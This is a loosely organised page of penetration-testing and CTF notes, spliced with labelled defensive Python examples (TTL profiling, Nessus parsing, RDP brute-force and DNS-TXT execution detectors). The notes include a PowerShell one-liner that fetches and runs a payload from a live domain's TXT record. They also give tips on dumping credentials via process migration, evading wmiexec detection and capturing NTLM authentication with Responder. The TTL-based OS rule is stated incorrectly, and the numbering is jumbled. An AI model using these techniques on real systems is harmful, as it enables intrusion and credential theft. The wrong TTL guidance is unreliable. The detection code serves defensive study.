Tactics, Techniques, and Procedures
Offensive Security Notes

Unorganized collections of my notes from CTFs and penetration tests

Last updated 3 months ago

1. Search for whitelisted applications when looking to migrate and dump credentials. During a penetration test I was struggling to dump credentials with Kiwi as a PoC. Migrating into an AppSense application that is required to be whitelisted by endpoints can result in easy l00t. This link lists a few of the executables that I was able to migrate into with Meterpreter and proceed to execute Kiwi from, namely EMUser.exe.

2. Time to Live (TTL) as a rough OS hint:

TTL > 64: it is most likely a Linux box
TTL > 128: it is most likely a Windows box
TTL < 128: most likely some type of networking device
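The TTL rule of thumb above, worked through as an added example (not from the original notes): it uses the common default initial TTLs (64 for Linux/Unix-like, 128 for Windows, 255 for most network devices), corrects for the hops a packet has already traversed, and flags a source IP whose packets imply more than one OS family, which is where the guess stops being trustworthy. The host/TTL observations are constructed sample data.

```python
# Added example (not from the original notes): infer a packet's likely initial
# TTL, OS family and hop count from the TTL seen at the sensor. Assumes the
# common default initial TTLs: 64 (Linux/macOS/BSD), 128 (Windows),
# 255 (most routers, switches and appliances, also Solaris).
DEFAULT_TTLS = {64: "Linux/Unix-like", 128: "Windows", 255: "Network device"}

def guess_initial_ttl(observed_ttl):
    """Return (initial_ttl, os_family, hops_traversed) for one observed TTL."""
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be within 1..255")
    # Routers only ever decrement TTL, so the sender started at the smallest
    # default that is >= what we see; the difference is the path length.
    for initial in sorted(DEFAULT_TTLS):
        if observed_ttl <= initial:
            return initial, DEFAULT_TTLS[initial], initial - observed_ttl

def profile_hosts(observations):
    """Map each source IP to the set of initial TTLs inferred for it."""
    profile = {}
    for ip, ttl in observations:
        profile.setdefault(ip, set()).add(guess_initial_ttl(ttl)[0])
    return profile

def inconsistent_hosts(observations):
    """Source IPs whose packets imply more than one OS family: typically a
    NAT gateway fronting mixed hosts, a TTL-rewriting middlebox or a spoofed
    source. Worth a closer look before trusting the OS guess."""
    return sorted(ip for ip, s in profile_hosts(observations).items() if len(s) > 1)

# Constructed sample: (source IP, TTL as observed at the sensor)
SAMPLE = [("10.0.0.5", 63), ("10.0.0.5", 62), ("10.0.0.9", 125),
          ("10.0.0.9", 60), ("10.0.0.7", 250)]

if __name__ == "__main__":
    for ip, ttl in SAMPLE:
        print(ip, ttl, guess_initial_ttl(ttl))
    print("inconsistent:", inconsistent_hosts(SAMPLE))
```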

3. Some quick notes on organizing tooling:

  • Download and place the tool into /opt/ (e.g., Aquatone).

  • Execute the following command on the Aquatone binary: ln -s /opt/aquatone/aquatone /usr/local/bin/aquatone

3. Reverse shell preferences:

  • External: Bind shell

  • Internal: Reverse shell

4. Microsoft has a great reference for .NET Framework & Windows OS versions. We can then use a precompiled binary from SharpCollection to exploit the system.

  • Compile the binaries yourself, unless it's a CTF.

5. Performing password spraying with SprayCharles, from my experience, is more successful than using the SprayingToolkit. I ran into a situation on an engagement where multiple valid logins were reported as invalid by SprayingToolkit.

6. Kali Linux allows multiple IP addresses to be set manually on an interface, so you can set multiple callbacks in case one of your IP addresses gets banned. The screenshot demonstrating this is not reproduced here.

7. Download a Nessus scan via Metasploit:

# Load the Nessus plugin
load nessus

# Authenticate to Nessus
nessus_connect $username:$password@127.0.0.1:8834

# List available Nessus scans (pay attention to the ID)
nessus_scan_list

# Export the Nessus scan
nessus_scan_export $id nessus

# Download the Nessus scan to ~/.msf
nessus_report_download $id $fileid

# Report is then accessible in the ~/.msf4/local directory
# Rename the file to $client.nessus
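Once the .nessus file is on disk, the next step is usually triage. The following is an added example (not from the original notes or from Tenable) that parses the NessusClientData_v2 format with the standard library and ranks hosts by their worst finding; the embedded document, plugin IDs and plugin names are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from collections import Counter

SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed, minimal .nessus (v2) document standing in for the exported
# file; plugin IDs and names are placeholders, not real Nessus plugins.
SAMPLE_NESSUS = """<?xml version="1.0"?>
<NessusClientData_v2><Report name="client-internal">
 <ReportHost name="10.0.0.5">
  <HostProperties><tag name="host-fqdn">dc01.corp.example</tag></HostProperties>
  <ReportItem port="445" protocol="tcp" severity="3" pluginID="900001" pluginName="SMB signing not required (placeholder)"><risk_factor>High</risk_factor></ReportItem>
  <ReportItem port="0" protocol="tcp" severity="0" pluginID="900002" pluginName="OS identification (placeholder)"><risk_factor>None</risk_factor></ReportItem>
 </ReportHost>
 <ReportHost name="10.0.0.8">
  <HostProperties><tag name="host-fqdn">ws02.corp.example</tag></HostProperties>
  <ReportItem port="3389" protocol="tcp" severity="4" pluginID="900003" pluginName="RDP unpatched RCE (placeholder)"><risk_factor>Critical</risk_factor></ReportItem>
  <ReportItem port="443" protocol="tcp" severity="2" pluginID="900004" pluginName="TLS weak cipher suites (placeholder)"><risk_factor>Medium</risk_factor></ReportItem>
 </ReportHost>
</Report></NessusClientData_v2>"""

def parse_nessus(xml_text):
    """Return {ip: {"fqdn": str, "findings": [(severity, port, plugin_name), ...]}}."""
    root = ET.fromstring(xml_text)
    if root.tag != "NessusClientData_v2":
        raise ValueError("not a .nessus v2 document")
    hosts = {}
    for rh in root.iter("ReportHost"):
        fqdn = rh.findtext("HostProperties/tag[@name='host-fqdn']", default="")
        findings = [(int(ri.get("severity", "0")), ri.get("port"), ri.get("pluginName"))
                    for ri in rh.findall("ReportItem")]
        hosts[rh.get("name")] = {"fqdn": fqdn, "findings": findings}
    return hosts

def severity_counts(hosts):
    """Count findings per severity label across all hosts."""
    return dict(Counter(SEVERITY[sev] for h in hosts.values() for sev, _, _ in h["findings"]))

def hosts_at_or_above(hosts, min_severity=3):
    """Hosts with at least one finding >= min_severity, worst host first."""
    worst = {ip: max((f[0] for f in h["findings"]), default=0) for ip, h in hosts.items()}
    return [ip for ip, w in sorted(worst.items(), key=lambda kv: -kv[1]) if w >= min_severity]
```

Point parse_nessus at the contents of $client.nessus to get the same summary for a real export.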

8. Quick SSH tips (press Enter first so the ~C escape is recognised at the start of a line; it opens the SSH command line on the existing session):

Add a SOCKS proxy to an existing SSH connection

<enter> ~C
-D 1080

Forward a port on an existing SSH connection

<enter> ~C
-L 1337:localhost:1337

12. Your daily reminder that RDP local admin brute force has no rate limiting.
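The defender-side counterpart to that reminder, as an added example that is not part of the original notes: a small detector over failed-logon events (Event ID 4625) that flags a source IP with a burst of RDP failures inside a short window and notes whether a successful logon (4624) from the same source followed. The log lines are constructed sample data in a flattened one-event-per-line form.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of flattened Security-log events (not real log data):
# 4625 = failed logon, 4624 = successful logon. Logon type 10 is RDP
# (RemoteInteractive); with NLA enabled a failed RDP logon is recorded as
# type 3 instead, so a detector keyed only on type 10 misses it.
SAMPLE_LOG = """\
2024-05-01T09:00:01 EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=administrator
2024-05-01T09:00:03 EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=admin
2024-05-01T09:00:05 EventID=4625 LogonType=3 IpAddress=203.0.113.7 TargetUserName=backup
2024-05-01T09:00:07 EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=svc_sql
2024-05-01T09:00:09 EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=jsmith
2024-05-01T09:00:10 EventID=4624 LogonType=10 IpAddress=203.0.113.7 TargetUserName=jsmith
2024-05-01T09:30:00 EventID=4625 LogonType=10 IpAddress=10.0.0.23 TargetUserName=jdoe
2024-05-01T09:45:00 EventID=4625 LogonType=10 IpAddress=10.0.0.23 TargetUserName=jdoe
"""

LINE_RE = re.compile(r"^(\S+) EventID=(\d+) LogonType=(\d+) IpAddress=(\S+) TargetUserName=(\S+)$")

def parse_events(log_text):
    """Yield (timestamp, event_id, logon_type, source_ip, user) per parsable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, eid, ltype, ip, user = m.groups()
            yield datetime.fromisoformat(ts), int(eid), int(ltype), ip, user

def detect_rdp_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: (failures_in_window, distinct_users, success_after)}.
    A source is flagged once it has >= threshold failed logons inside `window`;
    a later 4624 from the same source marks the burst as probably successful."""
    recent = defaultdict(deque)    # source_ip -> failure timestamps in window
    users = defaultdict(set)
    alerts = {}
    for ts, eid, ltype, ip, user in parse_events(log_text):
        if ltype not in (3, 10):
            continue
        if eid == 4625:
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            users[ip].add(user)
            if len(q) >= threshold:
                alerts[ip] = (len(q), len(users[ip]), False)
        elif eid == 4624 and ip in alerts:
            failures, distinct, _ = alerts[ip]
            alerts[ip] = (failures, distinct, True)
    return alerts
```

Because local-account lockout and rate limiting cannot be relied on, the window-and-threshold logic above is what compensates: a real deployment would feed it from the Security channel or a SIEM rather than a string.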

13. If you have a shell on a Windows host and need to check whether your process is high integrity without sounding alarms, you can issue the following check:

# >= high integrity if a file listing is shown
CMD        -> dir \windows\temp
PowerShell -> ls \windows\temp

14. A fun way to execute payloads is via a domain's TXT record; the following command will run the provided payload:

powershell . (nslookup -q=txt parzival.sh)[-1]
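From the detection side, that one-liner leaves a distinctive process command line. The following is an added example (not from the original notes) that classifies process-creation command lines, separating a plain TXT query from one whose result is handed to PowerShell for evaluation; the command lines are constructed samples using reserved example domains.

```python
import re

# Constructed process-creation command lines (as seen in Sysmon Event ID 1 or
# 4688 with command-line auditing). Not real telemetry.
SAMPLE_CMDLINES = [
    "powershell . (nslookup -q=txt example.test)[-1]",
    "powershell iex (nslookup -type=txt payload.example.test)[-1]",
    "nslookup -q=txt _dmarc.example.test",
    "powershell Get-ChildItem C:\\Windows\\Temp",
    'cmd /c "nslookup -querytype=TXT lookup.example.test > out.txt"',
]

# nslookup invoked with a TXT query type in any of its spellings.
NSLOOKUP_TXT = re.compile(r"nslookup\b[^|&;]*-(?:q|type|querytype)=txt", re.I)
# PowerShell evaluating something: iex / Invoke-Expression, or the call
# operator form ". (" used by the one-liner above.
EXEC_HINT = re.compile(r"\bpowershell(?:\.exe)?\b.*(?:\biex\b|invoke-expression|(?:^|\s)\.\s*\()", re.I)

def classify(cmdline):
    """'execute-from-dns' when a TXT lookup feeds a PowerShell evaluation,
    'txt-lookup' for a bare TXT query (benign, e.g. mail checks), else None."""
    if not NSLOOKUP_TXT.search(cmdline):
        return None
    return "execute-from-dns" if EXEC_HINT.search(cmdline) else "txt-lookup"

def suspicious(cmdlines):
    """Only the command lines that warrant an alert."""
    return [c for c in cmdlines if classify(c) == "execute-from-dns"]
```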

15. Always perform content discovery both as an unauthenticated and as an authenticated user (provide cookies to your tool of choice).

16. Trigger NTLM authentication over HTTP from the command line (replace <target-host> with the host that should receive the authentication):

Invoke-WebRequest -UseDefaultCredentials -Uri http://<target-host>/

  1. Impacket's wmiexec.py is useful for lateral movement but is often detected. To potentially defeat detections, change the target share (-share C$) or use "-silentcommand".

  2. Leave Pcredz, Impacket's SMB server, Responder (Analyze mode), etc. running all the time. You never know when a random Domain Admin will try to authenticate to you over NTLM (agentless security products).

  3. If you PWN a system during a penetration test (local admin privileges) but still don't have a "domain user", you can escalate privileges to SYSTEM and leverage the machine account.

  4. Large password lists such as Rockyou2021 are mostly junk. Bigger ≠ better. Weakpass.com has several wordlists, with Kaonashi being decent and https://weakpass.com/wordlist/1927 being one of the largest suggested, as they're inflated with junk.

9. Make your life significantly easier when analyzing email headers with Message Header Analyzer.

10. Trying to make a high-quality screenshot to illustrate the commands used? Check out carbon.now.sh.

10. Don't know what a command does? There's no shame in that. For Linux check out ExplainShell, and for PowerShell use ExplainPowershell.

11. Check the configuration of LAPS using a machine account, per @HackingLZ, as it was noted that configurations are often messed up for them.
